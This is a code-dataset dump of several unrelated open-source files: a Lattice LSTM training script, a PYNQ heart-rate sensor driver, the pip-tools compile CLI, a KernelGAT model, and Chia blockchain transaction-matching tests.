max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
3-2.Lattice_LSTM/train.py | techthiyanes/nlp-notebook | 136 | 12609649 | <filename>3-2.Lattice_LSTM/train.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
import time
import torch
import torch.optim as optim
import matplotlib.pyplot as plt
import numpy as np
from model import LatticeLSTM
from load_data import char2idx, word2idx, label2idx, data_generator
character_size = len(char2idx)
word_size = len(word2idx)
embed_dim = 300
hidden_dim = 128
EPOCHS = 20
TRAIN_DATA_PATH = './data/train_data'
device = "cuda" if torch.cuda.is_available() else 'cpu'
model = LatticeLSTM(character_size, word_size, label2idx, embed_dim, hidden_dim).to(device)
model.train()
optimizer = optim.Adam(model.parameters(), lr=0.001)
start = time.time()
loss_vals = []
for epoch in range(EPOCHS):
epoch_loss= []
#num = 0
for sent, input_ids, input_words, labels_idx in data_generator(TRAIN_DATA_PATH, char2idx, word2idx, label2idx, shuffle=True):
#num += 1
model.zero_grad()
loss = model.neg_log_likelihood(input_ids, input_words, labels_idx)
loss.backward()
epoch_loss.append(loss.item())
#print(f' num {num}, loss:{loss.item()}')
optimizer.step()
#if num == 3000:
# break
loss_vals.append(np.mean(epoch_loss))
print(f'Epoch[{epoch}] - Loss:{np.mean(epoch_loss)}')
torch.save(model.state_dict(), "./saved_model/model_lattice.pth")
plt.plot(np.linspace(1, EPOCHS, EPOCHS).astype(int), loss_vals)
end = time.time()
print(f'Training costs:{end-start} seconds') |
pynq/lib/pmod/pmod_grove_ear_hr.py | michalkouril/PYNQ | 1,537 | 12609651 | # Copyright (c) 2016, NECST Laboratory, Politecnico di Milano
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from . import Pmod
from . import PMOD_GROVE_G1
from . import PMOD_GROVE_G2
from . import PMOD_GROVE_G3
from . import PMOD_GROVE_G4
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2016, NECST Laboratory, Politecnico di Milano"
PMOD_GROVE_EAR_HR_PROGRAM = "pmod_grove_ear_hr.bin"
CONFIG_IOP_SWITCH = 0x1
class Grove_EarHR(object):
"""This class controls the Grove ear clip heart rate sensor.
Sensor model: MED03212P.
Attributes
----------
microblaze : Pmod
Microblaze processor instance used by this module.
"""
def __init__(self, mb_info, gr_pin):
"""Return a new instance of an Grove_EarHR object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
gr_pin: list
A group of pins on pmod-grove adapter.
"""
if gr_pin not in [PMOD_GROVE_G1,
PMOD_GROVE_G2,
PMOD_GROVE_G3,
PMOD_GROVE_G4]:
raise ValueError("Group number can only be G1 - G4.")
self.microblaze = Pmod(mb_info, PMOD_GROVE_EAR_HR_PROGRAM)
self.microblaze.write_mailbox(0, gr_pin[0])
self.microblaze.write_blocking_command(CONFIG_IOP_SWITCH)
def read(self):
"""Read the heart rate from the sensor.
Returns
-------
float
The heart rate as beats per minute
"""
beats, interval_ms = self.read_raw()
if 0 < interval_ms < 2500:
rate = 60000.0 / interval_ms
else:
raise RuntimeError("Value out of range or device not connected.")
return rate
def read_raw(self):
"""Read the number of heart beats.
Read the number of beats since the sensor initialization; also read
the time elapsed in ms between the latest two heart beats.
Returns
-------
tuple
Number of heart beats and the time elapsed between 2 latest beats.
"""
beats = self.microblaze.read_mailbox(0x4)
interval_ms = self.microblaze.read_mailbox(0x8 + (beats % 4)*4)
return beats, interval_ms
|
terrascript/provider/gitlab.py | hugovk/python-terrascript | 507 | 12609712 | # terrascript/provider/gitlab.py
import terrascript
class gitlab(terrascript.Provider):
pass
__all__ = ["gitlab"]
|
rosie/rosie/chamber_of_deputies/tests/test_monthly_subquota_limit_classifier.py | vbarceloscs/serenata-de-amor | 3,001 | 12609713 | <reponame>vbarceloscs/serenata-de-amor<gh_stars>1000+
from unittest import TestCase
import numpy as np
import pandas as pd
from rosie.chamber_of_deputies.classifiers.monthly_subquota_limit_classifier import MonthlySubquotaLimitClassifier
class TestMonthlySubquotaLimitClassifier(TestCase):
'''Testing Monthly Subquota Limit Classifier.
To include new test cases edit `MONTHLY_SUBQUOTA_LIMIT_FIXTURE_FILE`.
Each test case must have the following fields (see existing test cases as examples):
applicant_id:
A personal identifier code for every person making expenses.
Use the same number to group a test case that requires more than one
expense request.
subquota_number:
A number to classify a category of expenses.
Allowed values:
3 -- Fuels and lubricants
8 -- Security service provided by specialized company
120 -- Automotive vehicle renting or charter
122 -- Taxi, toll and parking
137 -- Participation in course, talk or similar event
issue_date:
Date when the expense was made.
year:
The quota year matching the expense request.
month:
The quota month matching the expense request.
net_value:
The value of the expense.
expected_prediction:
True or False indicating if this test case must be classified as suspicious or not.
test_case_description:
Description of what is being tested in this test case (also showed when test fails)
'''
MONTHLY_SUBQUOTA_LIMIT_FIXTURE_FILE = 'rosie/chamber_of_deputies/tests/fixtures/monthly_subquota_limit_classifier.csv'
def setUp(self):
self.full_dataset = pd.read_csv(
self.MONTHLY_SUBQUOTA_LIMIT_FIXTURE_FILE, dtype={'subquota_number': np.str})
self.dataset = self.full_dataset[
['applicant_id', 'subquota_number', 'issue_date', 'year', 'month', 'net_value']]
self.test_result_dataset = self.full_dataset[['expected_prediction', 'test_case_description']]
self.subject = MonthlySubquotaLimitClassifier()
self.subject.fit_transform(self.dataset)
self.prediction = self.subject.predict(self.dataset)
def test_predictions(self):
for index, row in self.test_result_dataset.iterrows():
self.assertEqual(
self.prediction[index],
row['expected_prediction'],
msg='Line {0}: {1}'.format(row, row['test_case_description'])) |
piptools/scripts/compile.py | m-mead/pip-tools | 4,085 | 12609805 | import itertools
import os
import shlex
import sys
import tempfile
from typing import IO, Any, BinaryIO, List, Optional, Tuple, Union, cast
import click
from click.utils import LazyFile, safecall
from pep517 import meta
from pip._internal.commands import create_command
from pip._internal.req import InstallRequirement
from pip._internal.req.constructors import install_req_from_line
from pip._internal.utils.misc import redact_auth_from_url
from .._compat import IS_CLICK_VER_8_PLUS, parse_requirements
from ..cache import DependencyCache
from ..exceptions import PipToolsError
from ..locations import CACHE_DIR
from ..logging import log
from ..repositories import LocalRequirementsRepository, PyPIRepository
from ..repositories.base import BaseRepository
from ..resolver import Resolver
from ..utils import (
UNSAFE_PACKAGES,
dedup,
drop_extras,
is_pinned_requirement,
key_from_ireq,
)
from ..writer import OutputWriter
DEFAULT_REQUIREMENTS_FILE = "requirements.in"
DEFAULT_REQUIREMENTS_OUTPUT_FILE = "requirements.txt"
METADATA_FILENAMES = frozenset({"setup.py", "setup.cfg", "pyproject.toml"})
# TODO: drop click 7 and remove this block, pass directly to version_option
version_option_kwargs = {"package_name": "pip-tools"} if IS_CLICK_VER_8_PLUS else {}
def _get_default_option(option_name: str) -> Any:
"""
Get default value of the pip's option (including option from pip.conf)
by a given option name.
"""
install_command = create_command("install")
default_values = install_command.parser.get_default_values()
return getattr(default_values, option_name)
@click.command(context_settings={"help_option_names": ("-h", "--help")})
@click.version_option(**version_option_kwargs)
@click.pass_context
@click.option("-v", "--verbose", count=True, help="Show more output")
@click.option("-q", "--quiet", count=True, help="Give less output")
@click.option(
"-n",
"--dry-run",
is_flag=True,
help="Only show what would happen, don't change anything",
)
@click.option(
"-p",
"--pre",
is_flag=True,
default=None,
help="Allow resolving to prereleases (default is not)",
)
@click.option(
"-r",
"--rebuild",
is_flag=True,
help="Clear any caches upfront, rebuild from scratch",
)
@click.option(
"--extra",
"extras",
multiple=True,
help="Name of an extras_require group to install; may be used more than once",
)
@click.option(
"-f",
"--find-links",
multiple=True,
help="Look for archives in this directory or on this HTML page; may be used more than once",
)
@click.option(
"-i",
"--index-url",
help="Change index URL (defaults to {index_url})".format(
index_url=redact_auth_from_url(_get_default_option("index_url"))
),
)
@click.option(
"--extra-index-url",
multiple=True,
help="Add another index URL to search; may be used more than once",
)
@click.option("--cert", help="Path to alternate CA bundle.")
@click.option(
"--client-cert",
help="Path to SSL client certificate, a single file containing "
"the private key and the certificate in PEM format.",
)
@click.option(
"--trusted-host",
multiple=True,
help="Mark this host as trusted, even though it does not have "
"valid or any HTTPS; may be used more than once",
)
@click.option(
"--header/--no-header",
is_flag=True,
default=True,
help="Add header to generated file",
)
@click.option(
"--emit-trusted-host/--no-emit-trusted-host",
is_flag=True,
default=True,
help="Add trusted host option to generated file",
)
@click.option(
"--annotate/--no-annotate",
is_flag=True,
default=True,
help="Annotate results, indicating where dependencies come from",
)
@click.option(
"--annotation-style",
type=click.Choice(("line", "split")),
default="split",
help="Choose the format of annotation comments",
)
@click.option(
"-U",
"--upgrade/--no-upgrade",
is_flag=True,
default=False,
help="Try to upgrade all dependencies to their latest versions",
)
@click.option(
"-P",
"--upgrade-package",
"upgrade_packages",
nargs=1,
multiple=True,
help="Specify a particular package to upgrade; may be used more than once",
)
@click.option(
"-o",
"--output-file",
nargs=1,
default=None,
type=click.File("w+b", atomic=True, lazy=True),
help=(
"Output file name. Required if more than one input file is given. "
"Will be derived from input file otherwise."
),
)
@click.option(
"--allow-unsafe/--no-allow-unsafe",
is_flag=True,
default=False,
help=(
"Pin packages considered unsafe: {}.\n\n"
"WARNING: Future versions of pip-tools will enable this behavior by default. "
"Use --no-allow-unsafe to keep the old behavior. It is recommended to pass the "
"--allow-unsafe now to adapt to the upcoming change.".format(
", ".join(sorted(UNSAFE_PACKAGES))
)
),
)
@click.option(
"--strip-extras",
is_flag=True,
default=False,
help="Assure output file is constraints compatible, avoiding use of extras.",
)
@click.option(
"--generate-hashes",
is_flag=True,
default=False,
help="Generate pip 8 style hashes in the resulting requirements file.",
)
@click.option(
"--reuse-hashes/--no-reuse-hashes",
is_flag=True,
default=True,
help=(
"Improve the speed of --generate-hashes by reusing the hashes from an "
"existing output file."
),
)
@click.option(
"--max-rounds",
default=10,
help="Maximum number of rounds before resolving the requirements aborts.",
)
@click.argument("src_files", nargs=-1, type=click.Path(exists=True, allow_dash=True))
@click.option(
"--build-isolation/--no-build-isolation",
is_flag=True,
default=True,
help="Enable isolation when building a modern source distribution. "
"Build dependencies specified by PEP 518 must be already installed "
"if build isolation is disabled.",
)
@click.option(
"--emit-find-links/--no-emit-find-links",
is_flag=True,
default=True,
help="Add the find-links option to generated file",
)
@click.option(
"--cache-dir",
help="Store the cache data in DIRECTORY.",
default=CACHE_DIR,
envvar="PIP_TOOLS_CACHE_DIR",
show_default=True,
show_envvar=True,
type=click.Path(file_okay=False, writable=True),
)
@click.option(
"--pip-args", "pip_args_str", help="Arguments to pass directly to the pip command."
)
@click.option(
"--emit-index-url/--no-emit-index-url",
is_flag=True,
default=True,
help="Add index URL to generated file",
)
@click.option(
"--emit-options/--no-emit-options",
is_flag=True,
default=True,
help="Add options to generated file",
)
def cli(
ctx: click.Context,
verbose: int,
quiet: int,
dry_run: bool,
pre: bool,
rebuild: bool,
extras: Tuple[str, ...],
find_links: Tuple[str, ...],
index_url: str,
extra_index_url: Tuple[str, ...],
cert: Optional[str],
client_cert: Optional[str],
trusted_host: Tuple[str, ...],
header: bool,
emit_trusted_host: bool,
annotate: bool,
annotation_style: str,
upgrade: bool,
upgrade_packages: Tuple[str, ...],
output_file: Union[LazyFile, IO[Any], None],
allow_unsafe: bool,
strip_extras: bool,
generate_hashes: bool,
reuse_hashes: bool,
src_files: Tuple[str, ...],
max_rounds: int,
build_isolation: bool,
emit_find_links: bool,
cache_dir: str,
pip_args_str: Optional[str],
emit_index_url: bool,
emit_options: bool,
) -> None:
"""Compiles requirements.txt from requirements.in specs."""
log.verbosity = verbose - quiet
if len(src_files) == 0:
if os.path.exists(DEFAULT_REQUIREMENTS_FILE):
src_files = (DEFAULT_REQUIREMENTS_FILE,)
elif os.path.exists("setup.py"):
src_files = ("setup.py",)
else:
raise click.BadParameter(
(
"If you do not specify an input file, "
"the default is {} or setup.py"
).format(DEFAULT_REQUIREMENTS_FILE)
)
if not output_file:
# An output file must be provided for stdin
if src_files == ("-",):
raise click.BadParameter("--output-file is required if input is from stdin")
# Use default requirements output file if there is a setup.py the source file
elif os.path.basename(src_files[0]) in METADATA_FILENAMES:
file_name = os.path.join(
os.path.dirname(src_files[0]), DEFAULT_REQUIREMENTS_OUTPUT_FILE
)
# An output file must be provided if there are multiple source files
elif len(src_files) > 1:
raise click.BadParameter(
"--output-file is required if two or more input files are given."
)
# Otherwise derive the output file from the source file
else:
base_name = src_files[0].rsplit(".", 1)[0]
file_name = base_name + ".txt"
output_file = click.open_file(file_name, "w+b", atomic=True, lazy=True)
# Close the file at the end of the context execution
assert output_file is not None
# only LazyFile has close_intelligently, newer IO[Any] does not
if isinstance(output_file, LazyFile): # pragma: no cover
ctx.call_on_close(safecall(output_file.close_intelligently))
###
# Setup
###
right_args = shlex.split(pip_args_str or "")
pip_args = []
for link in find_links:
pip_args.extend(["-f", link])
if index_url:
pip_args.extend(["-i", index_url])
for extra_index in extra_index_url:
pip_args.extend(["--extra-index-url", extra_index])
if cert:
pip_args.extend(["--cert", cert])
if client_cert:
pip_args.extend(["--client-cert", client_cert])
if pre:
pip_args.extend(["--pre"])
for host in trusted_host:
pip_args.extend(["--trusted-host", host])
if not build_isolation:
pip_args.append("--no-build-isolation")
pip_args.extend(right_args)
repository: BaseRepository
repository = PyPIRepository(pip_args, cache_dir=cache_dir)
# Parse all constraints coming from --upgrade-package/-P
upgrade_reqs_gen = (install_req_from_line(pkg) for pkg in upgrade_packages)
upgrade_install_reqs = {
key_from_ireq(install_req): install_req for install_req in upgrade_reqs_gen
}
existing_pins_to_upgrade = set()
# Proxy with a LocalRequirementsRepository if --upgrade is not specified
# (= default invocation)
if not upgrade and os.path.exists(output_file.name):
# Use a temporary repository to ensure outdated(removed) options from
# existing requirements.txt wouldn't get into the current repository.
tmp_repository = PyPIRepository(pip_args, cache_dir=cache_dir)
ireqs = parse_requirements(
output_file.name,
finder=tmp_repository.finder,
session=tmp_repository.session,
options=tmp_repository.options,
)
# Exclude packages from --upgrade-package/-P from the existing
# constraints, and separately gather pins to be upgraded
existing_pins = {}
for ireq in filter(is_pinned_requirement, ireqs):
key = key_from_ireq(ireq)
if key in upgrade_install_reqs:
existing_pins_to_upgrade.add(key)
else:
existing_pins[key] = ireq
repository = LocalRequirementsRepository(
existing_pins, repository, reuse_hashes=reuse_hashes
)
###
# Parsing/collecting initial requirements
###
constraints: List[InstallRequirement] = []
setup_file_found = False
for src_file in src_files:
is_setup_file = os.path.basename(src_file) in METADATA_FILENAMES
if src_file == "-":
# pip requires filenames and not files. Since we want to support
# piping from stdin, we need to briefly save the input from stdin
# to a temporary file and have pip read that. also used for
# reading requirements from install_requires in setup.py.
tmpfile = tempfile.NamedTemporaryFile(mode="wt", delete=False)
tmpfile.write(sys.stdin.read())
comes_from = "-r -"
tmpfile.flush()
reqs = list(
parse_requirements(
tmpfile.name,
finder=repository.finder,
session=repository.session,
options=repository.options,
)
)
for req in reqs:
req.comes_from = comes_from
constraints.extend(reqs)
elif is_setup_file:
setup_file_found = True
dist = meta.load(os.path.dirname(os.path.abspath(src_file)))
comes_from = f"{dist.metadata.get_all('Name')[0]} ({src_file})"
constraints.extend(
[
install_req_from_line(req, comes_from=comes_from)
for req in dist.requires or []
]
)
else:
constraints.extend(
parse_requirements(
src_file,
finder=repository.finder,
session=repository.session,
options=repository.options,
)
)
extras = tuple(itertools.chain.from_iterable(ex.split(",") for ex in extras))
if extras and not setup_file_found:
msg = "--extra has effect only with setup.py and PEP-517 input formats"
raise click.BadParameter(msg)
primary_packages = {
key_from_ireq(ireq) for ireq in constraints if not ireq.constraint
}
allowed_upgrades = primary_packages | existing_pins_to_upgrade
constraints.extend(
ireq for key, ireq in upgrade_install_reqs.items() if key in allowed_upgrades
)
constraints = [req for req in constraints if req.match_markers(extras)]
for req in constraints:
drop_extras(req)
log.debug("Using indexes:")
with log.indentation():
for index_url in dedup(repository.finder.index_urls):
log.debug(redact_auth_from_url(index_url))
if repository.finder.find_links:
log.debug("")
log.debug("Using links:")
with log.indentation():
for find_link in dedup(repository.finder.find_links):
log.debug(redact_auth_from_url(find_link))
try:
resolver = Resolver(
constraints,
repository,
prereleases=repository.finder.allow_all_prereleases or pre,
cache=DependencyCache(cache_dir),
clear_caches=rebuild,
allow_unsafe=allow_unsafe,
)
results = resolver.resolve(max_rounds=max_rounds)
hashes = resolver.resolve_hashes(results) if generate_hashes else None
except PipToolsError as e:
log.error(str(e))
sys.exit(2)
log.debug("")
##
# Output
##
writer = OutputWriter(
cast(BinaryIO, output_file),
click_ctx=ctx,
dry_run=dry_run,
emit_header=header,
emit_index_url=emit_index_url,
emit_trusted_host=emit_trusted_host,
annotate=annotate,
annotation_style=annotation_style,
strip_extras=strip_extras,
generate_hashes=generate_hashes,
default_index_url=repository.DEFAULT_INDEX_URL,
index_urls=repository.finder.index_urls,
trusted_hosts=repository.finder.trusted_hosts,
format_control=repository.finder.format_control,
allow_unsafe=allow_unsafe,
find_links=repository.finder.find_links,
emit_find_links=emit_find_links,
emit_options=emit_options,
)
writer.write(
results=results,
unsafe_requirements=resolver.unsafe_constraints,
markers={
key_from_ireq(ireq): ireq.markers for ireq in constraints if ireq.markers
},
hashes=hashes,
)
if dry_run:
log.info("Dry-run, so nothing updated.")
|
kgat/models.py | QZx7/KernelGAT | 150 | 12609811 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import BatchNorm1d, Linear, ReLU
from bert_model import BertForSequenceEncoder
from torch.autograd import Variable
import numpy as np
def kernal_mus(n_kernels):
"""
get the mu for each guassian kernel. Mu is the middle of each bin
:param n_kernels: number of kernels (including exact match). first one is exact match
:return: l_mu, a list of mu.
"""
l_mu = [1]
if n_kernels == 1:
return l_mu
bin_size = 2.0 / (n_kernels - 1) # score range from [-1, 1]
l_mu.append(1 - bin_size / 2) # mu: middle of the bin
for i in range(1, n_kernels - 1):
l_mu.append(l_mu[i] - bin_size)
return l_mu
def kernel_sigmas(n_kernels):
"""
get sigmas for each guassian kernel.
:param n_kernels: number of kernels (including exactmath.)
:param lamb:
:param use_exact:
:return: l_sigma, a list of simga
"""
bin_size = 2.0 / (n_kernels - 1)
l_sigma = [0.001] # for exact match. small variance -> exact match
if n_kernels == 1:
return l_sigma
l_sigma += [0.1] * (n_kernels - 1)
return l_sigma
class inference_model(nn.Module):
def __init__(self, bert_model, args):
super(inference_model, self).__init__()
self.bert_hidden_dim = args.bert_hidden_dim
self.dropout = nn.Dropout(args.dropout)
self.max_len = args.max_len
self.num_labels = args.num_labels
self.pred_model = bert_model
self.evi_num = args.evi_num
self.nlayer = args.layer
self.kernel = args.kernel
self.proj_inference_de = nn.Linear(self.bert_hidden_dim * 2, self.num_labels)
self.proj_att = nn.Linear(self.kernel, 1)
self.proj_input_de = nn.Linear(self.bert_hidden_dim, self.bert_hidden_dim)
self.proj_gat = nn.Sequential(
Linear(self.bert_hidden_dim * 2, 128),
ReLU(True),
Linear(128, 1)
)
self.proj_select = nn.Linear(self.kernel, 1)
self.mu = Variable(torch.FloatTensor(kernal_mus(self.kernel)), requires_grad = False).view(1, 1, 1, 21).cuda()
self.sigma = Variable(torch.FloatTensor(kernel_sigmas(self.kernel)), requires_grad = False).view(1, 1, 1, 21).cuda()
def self_attention(self, inputs, inputs_hiddens, mask, mask_evidence, index):
idx = torch.LongTensor([index]).cuda()
mask = mask.view([-1, self.evi_num, self.max_len])
mask_evidence = mask_evidence.view([-1, self.evi_num, self.max_len])
own_hidden = torch.index_select(inputs_hiddens, 1, idx)
own_mask = torch.index_select(mask, 1, idx)
own_input = torch.index_select(inputs, 1, idx)
own_hidden = own_hidden.repeat(1, self.evi_num, 1, 1)
own_mask = own_mask.repeat(1, self.evi_num, 1)
own_input = own_input.repeat(1, self.evi_num, 1)
hiddens_norm = F.normalize(inputs_hiddens, p=2, dim=-1)
own_norm = F.normalize(own_hidden, p=2, dim=-1)
att_score = self.get_intersect_matrix_att(hiddens_norm.view(-1, self.max_len, self.bert_hidden_dim), own_norm.view(-1, self.max_len, self.bert_hidden_dim),
mask_evidence.view(-1, self.max_len), own_mask.view(-1, self.max_len))
att_score = att_score.view(-1, self.evi_num, self.max_len, 1)
#if index == 1:
# for i in range(self.evi_num):
#print (att_score.view(-1, self.evi_num, self.max_len)[0, 1, :])
denoise_inputs = torch.sum(att_score * inputs_hiddens, 2)
weight_inp = torch.cat([own_input, inputs], -1)
weight_inp = self.proj_gat(weight_inp)
weight_inp = F.softmax(weight_inp, dim=1)
outputs = (inputs * weight_inp).sum(dim=1)
weight_de = torch.cat([own_input, denoise_inputs], -1)
weight_de = self.proj_gat(weight_de)
weight_de = F.softmax(weight_de, dim=1)
outputs_de = (denoise_inputs * weight_de).sum(dim=1)
return outputs, outputs_de
def get_intersect_matrix(self, q_embed, d_embed, attn_q, attn_d):
attn_q = attn_q.view(attn_q.size()[0], attn_q.size()[1], 1)
attn_d = attn_d.view(attn_d.size()[0], 1, attn_d.size()[1], 1)
sim = torch.bmm(q_embed, torch.transpose(d_embed, 1, 2)).view(q_embed.size()[0], q_embed.size()[1], d_embed.size()[1], 1)
pooling_value = torch.exp((- ((sim - self.mu.cuda()) ** 2) / (self.sigma.cuda() ** 2) / 2)) * attn_d
pooling_sum = torch.sum(pooling_value, 2)
log_pooling_sum = torch.log(torch.clamp(pooling_sum, min=1e-10)) * attn_q
log_pooling_sum = torch.sum(log_pooling_sum, 1) / (torch.sum(attn_q, 1) + 1e-10)
log_pooling_sum = self.proj_select(log_pooling_sum).view([-1, 1])
return log_pooling_sum
def get_intersect_matrix_att(self, q_embed, d_embed, attn_q, attn_d):
attn_q = attn_q.view(attn_q.size()[0], attn_q.size()[1])
attn_d = attn_d.view(attn_d.size()[0], 1, attn_d.size()[1], 1)
sim = torch.bmm(q_embed, torch.transpose(d_embed, 1, 2)).view(q_embed.size()[0], q_embed.size()[1], d_embed.size()[1], 1)
pooling_value = torch.exp((- ((sim - self.mu.cuda()) ** 2) / (self.sigma.cuda() ** 2) / 2)) * attn_d
log_pooling_sum = torch.sum(pooling_value, 2)
log_pooling_sum = torch.log(torch.clamp(log_pooling_sum, min=1e-10))
log_pooling_sum = self.proj_att(log_pooling_sum).squeeze(-1)
log_pooling_sum = log_pooling_sum.masked_fill_((1 - attn_q).bool(), -1e4)
log_pooling_sum = F.softmax(log_pooling_sum, dim=1)
return log_pooling_sum
def forward(self, inputs):
inp_tensor, msk_tensor, seg_tensor = inputs
msk_tensor = msk_tensor.view(-1, self.max_len)
inp_tensor = inp_tensor.view(-1, self.max_len)
seg_tensor = seg_tensor.view(-1, self.max_len)
inputs_hiddens, inputs = self.pred_model(inp_tensor, msk_tensor, seg_tensor)
mask_text = msk_tensor.view(-1, self.max_len).float()
mask_text[:, 0] = 0.0
mask_claim = (1 - seg_tensor.float()) * mask_text
mask_evidence = seg_tensor.float() * mask_text
inputs_hiddens = inputs_hiddens.view(-1, self.max_len, self.bert_hidden_dim)
inputs_hiddens_norm = F.normalize(inputs_hiddens, p=2, dim=2)
log_pooling_sum = self.get_intersect_matrix(inputs_hiddens_norm, inputs_hiddens_norm, mask_claim, mask_evidence)
log_pooling_sum = log_pooling_sum.view([-1, self.evi_num, 1])
select_prob = F.softmax(log_pooling_sum, dim=1)
inputs = inputs.view([-1, self.evi_num, self.bert_hidden_dim])
inputs_hiddens = inputs_hiddens.view([-1, self.evi_num, self.max_len, self.bert_hidden_dim])
inputs_att_de = []
for i in range(self.evi_num):
outputs, outputs_de = self.self_attention(inputs, inputs_hiddens, mask_text, mask_text, i)
inputs_att_de.append(outputs_de)
inputs_att = inputs.view([-1, self.evi_num, self.bert_hidden_dim])
inputs_att_de = torch.cat(inputs_att_de, dim=1)
inputs_att_de = inputs_att_de.view([-1, self.evi_num, self.bert_hidden_dim])
inputs_att = torch.cat([inputs_att, inputs_att_de], -1)
inference_feature = self.proj_inference_de(inputs_att)
class_prob = F.softmax(inference_feature, dim=2)
prob = torch.sum(select_prob * class_prob, 1)
prob = torch.log(prob)
return prob
|
tests/generator/test_scan.py | ForestCrazy/chia-blockchain-remote-plot | 11,902 | 12609821 | <reponame>ForestCrazy/chia-blockchain-remote-plot
from unittest import TestCase
from chia.full_node.bundle_tools import (
match_standard_transaction_at_any_index,
match_standard_transaction_exactly_and_return_pubkey,
)
from chia.util.byte_types import hexstr_to_bytes
gen1 = hexstr_to_bytes(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
EXPECTED_START = 46
PUBKEY_PLUS_SUFFIX = 48 + 4 + 1
EXPECTED_END = 337 - PUBKEY_PLUS_SUFFIX
STANDARD_TRANSACTION_1 = hexstr_to_bytes(
"""ff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaff018080""" # noqa
)
STANDARD_TRANSACTION_2 = hexstr_to_bytes(
"""ff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b0bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbff018080""" # noqa
)
class TestScan(TestCase):
def test_match_generator(self):
# match_standard_transaction_at_any_index(generator_body: bytes) -> (int,int):
m = match_standard_transaction_at_any_index(gen1)
assert m == (EXPECTED_START, EXPECTED_END)
m = match_standard_transaction_at_any_index(b"\xff" + gen1 + b"\x80")
assert m == (EXPECTED_START + 1, EXPECTED_END + 1)
m = match_standard_transaction_at_any_index(gen1[47:])
assert m is None
def test_match_transaction(self):
# match_standard_transaction_exactly_and_return_pubkey(transaction: bytes) -> Optional[bytes]:
m = match_standard_transaction_exactly_and_return_pubkey(STANDARD_TRANSACTION_1)
assert m == hexstr_to_bytes(
"b0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
)
m = match_standard_transaction_exactly_and_return_pubkey(STANDARD_TRANSACTION_1 + b"\xfa")
assert m is None
